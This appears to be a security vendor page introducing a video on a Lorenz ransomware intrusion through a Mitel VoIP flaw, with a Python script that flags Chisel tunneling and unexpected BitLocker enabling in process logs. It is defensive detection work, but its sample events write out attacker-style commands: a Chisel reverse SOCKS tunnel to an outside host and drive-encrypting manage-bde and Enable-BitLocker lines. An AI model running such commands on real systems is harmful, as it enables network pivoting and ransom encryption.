Lorenz Ransomware Intrusion: Understanding Your Risk

The Arctic Wolf Labs team recently investigated a Lorenz ransomware intrusion that leveraged a vulnerability in the Mitel MiVoice Connect VoIP appliance (CVE-2022-29499) for initial access and Microsoft's BitLocker Drive Encryption, a native Windows feature, for data encryption rather than a custom ransomware binary.

Lorenz is a ransomware group that has been active since at least February 2021 and, like many ransomware groups, performs double extortion: it exfiltrates data before encrypting systems so that it can also threaten to leak it. Over the last quarter, the group has primarily targeted small and medium businesses (SMBs) in the United States, with outliers in China and Mexico.

In this video we cover:

  • Background on the Lorenz ransomware group
  • How the Lorenz ransomware group exploited CVE-2022-29499 in Mitel MiVoice Connect to gain initial access
  • How Chisel tunneling was used to pivot from the appliance into the internal environment
  • Arctic Wolf's recommendations for reducing your organization's attack surface against these TTPs

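The list above names two post-exploitation techniques, Chisel tunneling for the pivot and BitLocker for encryption. As an added example (not code from the Arctic Wolf report or the video), the Python below runs simple command-line heuristics over constructed process-creation events: a Chisel client started with an `R:` remote (a reverse tunnel back into the network) and BitLocker being turned on by a user outside the accounts that normally deploy it. The hostnames, users, addresses and exact command lines are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Heuristics are assumptions for this example, not indicators taken from the
# Arctic Wolf report. Chisel's CLI is "chisel client <server> <remote>..." or
# "chisel server ..."; a remote prefixed with "R:" asks the server to open a
# reverse tunnel back into the client's network, which is the pivoting pattern.
CHISEL_RE = re.compile(
    r"(?:^|[\\/\s])chisel(?:\.exe)?\s+(?P<mode>client|server)\b(?P<args>.*)", re.I
)
# BitLocker being turned on from the command line (manage-bde -on) or from
# PowerShell (Enable-BitLocker).
BITLOCKER_RE = re.compile(r"manage-bde(?:\.exe)?\s+.*?-on\b|Enable-BitLocker\b", re.I)


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    cmdline: str


def classify(event: dict, bitlocker_admins: Iterable[str] = ()) -> List[Finding]:
    """Return the findings a single process-creation event triggers."""
    cmd = event["cmdline"]
    found: List[Finding] = []

    m = CHISEL_RE.search(cmd)
    if m:
        mode = m.group("mode").lower()
        if mode == "client" and re.search(r"\bR:", m.group("args")):
            rule = "chisel_reverse_tunnel"
        else:
            rule = f"chisel_{mode}"
        found.append(Finding(event["host"], event["user"], rule, cmd))

    # BitLocker enrollment is routine for IT; only flag users outside the
    # known deployment accounts so the rule is not drowned in noise.
    if BITLOCKER_RE.search(cmd) and event["user"] not in set(bitlocker_admins):
        found.append(Finding(event["host"], event["user"], "bitlocker_enable", cmd))
    return found


def scan(events: Iterable[dict], bitlocker_admins: Iterable[str] = ()) -> List[Finding]:
    """Run classify() over a stream of events and collect every finding."""
    admins = set(bitlocker_admins)
    return [f for ev in events for f in classify(ev, admins)]


# Constructed sample events (hosts, users and addresses are made up; 203.0.113.0/24
# is a documentation range). Event 1 imitates a Chisel client on a compromised
# appliance; events 2 and 3 turn BitLocker on from a workstation.
SAMPLE_EVENTS = [
    {"host": "mitel-sa01", "user": "root",
     "cmdline": "/tmp/.x/chisel client 203.0.113.10:8080 R:socks"},
    {"host": "WS-FIN-07", "user": "CORP\\jdoe",
     "cmdline": "C:\\Windows\\System32\\manage-bde.exe -on C: -UsedSpaceOnly "
                "-RecoveryPassword -SkipHardwareTest"},
    {"host": "WS-FIN-07", "user": "CORP\\jdoe",
     "cmdline": "powershell.exe -nop -c \"Enable-BitLocker -MountPoint D: "
                "-PasswordProtector -Password $p\""},
    {"host": "SRV-FILE01", "user": "SYSTEM",
     "cmdline": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
    {"host": "WS-HR-02", "user": "CORP\\bob",
     "cmdline": "chrome.exe --type=renderer"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:22} {f.host:12} {f.user:12} {f.cmdline}")
```

Both rules key on names: the Chisel rule on the binary name and the BitLocker rule on Microsoft's documented commands. An attacker who renames the Chisel binary slips past the first rule, so pair it with network telemetry (Chisel carries its tunnel over HTTP/WebSocket to its server) and with alerts on volumes that go from unencrypted to BitLocker-protected, and tune the admin allowlist to your own deployment tooling.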
For more on Lorenz, visit: https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/